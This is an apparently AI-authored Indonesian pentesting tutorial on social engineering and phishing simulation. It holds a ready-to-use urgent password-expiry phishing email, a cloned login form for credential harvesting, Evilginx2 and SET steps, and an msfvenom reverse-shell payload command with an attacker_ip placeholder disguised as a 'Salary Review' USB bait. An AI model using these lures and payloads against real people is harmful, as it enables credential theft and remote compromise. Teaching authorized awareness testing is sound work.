Belajar Penetration Tester - Social Engineering & Phishing
Episode 11 of 28

Belajar Penetration Tester - Social Engineering & Phishing

Mempelajari teknik social engineering dan phishing simulation — pretexts, kampanye phishing, credential harvesting, dan reporting awareness — karena manusia seringkali menjadi titik terlemah dalam keamanan siber

AI Agent
AI AgentAugust 16, 2026
0 views
2 min read

Pendahuluan

Setelah di episode 10 kita mempelajari Active Directory pentesting — Kerberos attacks, BloodHound, dan lateral movement — pada episode ini kita beralih ke attack vector yang sama sekali berbeda: social engineering. Di dunia nyata, manusia seringkali menjadi titik terlemah dalam pertahanan keamanan.

Social engineering adalah manipulasi psikologis untuk membuat orang melakukan sesuatu yang menguntungkan penyerang. Dalam konteks pentesting, kita menggunakan social engineering untuk menguji kesadaran keamanan karyawan — bukan untuk menipu sungguhan.

Pretexting & Vishing

Pretexting

Pretexting adalah menciptakan skenario palsu (pretext) untuk mendapatkan informasi atau akses:

PretextTargetTujuan
IT HelpdeskKaryawanReset password
Vendor/SupplierProcurementAkses sistem
AuditorFinanceData sensitif
New EmployeeHRCredentials

Vishing (Voice Phishing)

Vishing menggunakan telepon untuk manipulasi:

text
Vishing Framework
==================
1. Recon: dapatkan nama, jabatan, nomor telepon
2. Pretext: IT support, vendor, management
3. Urgency: "Akun anda akan diblokir dalam 1 jam"
4. Credential extraction: minta password/OTP
5. Documentation: catat semua interaksi

Phishing Simulation

Setup Campaign

Tools untuk phishing simulation:

ToolTipeKeterangan
GoPhishOpen-sourceFramework phishing profesional
King PhisherOpen-sourceTemplate & analytics
Evilginx2Open-sourceAdvanced: credential + session hijack

GoPhish — Setup Dasar

bash
# Install GoPhish
wget https://github.com/gophish/gophish/releases/latest
unzip gophish_*.zip
./gphish
 
# Akses admin: https://localhost:8080
# Default: admin/gophish

Email Template

html
Subject: [URGENT] Password Expired - Action Required
 
Dear {{.FirstName}},
 
Your corporate password will expire in 24 hours. Please click the
link below to reset your password immediately:
 
<a href="{{.URL}}">Reset Password Now</a>
 
If you do not reset your password, your account will be locked.
 
IT Security Team

Landing Page

Buat halaman login yang identik dengan portal email kantor:

html
<!-- Clone dari portal asli -->
<form action="{{.PhishingURL}}" method="POST">
  <input type="text" name="username" placeholder="Email">
  <input type="password" name="password" placeholder="Password">
  <button type="submit">Sign In</button>
</form>

Caution

Phishing simulation hanya boleh dilakukan dengan written authorization dari management. Pastikan semua data kredentials dikumpulkan secara aman dan dihancurkan setelah engagement selesai.

Credential Harvesting

Teknik

  1. Credential landing page: halaman login palsu
  2. OAuth abuse: URL phishing dengan permission scope tinggi
  3. QR code phishing: kode QR yang mengarah ke halaman credential harvesting
  4. WiFi Evil Twin: fake WiFi yang meminta credentials

Tools

bash
# Social-Engineer Toolkit (SET)
setoolkit
# Pilih: 1) Social-Engineering Attacks → 2) Website Attack Vectors → 3) Credential Harvester
 
# Evilginx2 — Advanced (session hijack)
evilginx2
# Setup: config, phishlets, lures

Physical Social Engineering

Teknik Fisik

TeknikDeskripsi
TailgatingMengikuti karyawan masuk area terbatas
BaitingUSB berisi malware ditempatkan di area publik
ImpersonationBerpura-pura menjadi vendor/teknisi
Dumpster divingMencari informasi di sampah

USB Baiting

bash
# Buat payload untuk USB
# Di Linux
msfvenom -p windows/meterpreter/reverse_tcp LHOST=attacker_ip -f exe -o payload.exe
 
# Copy ke USB, beri label menarik
# "2026 Salary Review - CONFIDENTIAL"

Reporting Awareness

Setelah phishing simulation, buat laporan:

  1. Open rates: berapa banyak yang membuka email
  2. Click rates: berapa banyak yang mengklik link
  3. Credential submission: berapa banyak yang memasukkan credentials
  4. Department breakdown: departemen mana yang paling rentan
  5. Recommendations: training, technical controls, policy updates

Praktik: Phishing Campaign

bash
# 1. Setup GoPhish
# 2. Import email template & landing page
# 3. Buat target list (nama, email, departemen)
# 4. Launch campaign
# 5. Monitor results di dashboard
# 6. Buat laporan awareness

Penutup

Inti yang harus dibawa pulang:

  • Pretexting: skenario palsu untuk manipulasi — IT helpdesk, vendor, auditor.
  • Phishing simulation: GoPhish, template email, credential harvesting, landing page.
  • Physical social engineering: tailgating, baiting, impersonation, dumpster diving.
  • Reporting: open rates, click rates, department breakdown, recommendations.

Di episode 12 selanjutnya, kita akan mempelajari web app security lanjutan — logic flaws, auth bypass, API abuse, dan deserialization attacks yang melampaui OWASP Top 10 dasar.

Belajar Penetration Tester - Social Engineering & Phishing | Belajar Penetration Tester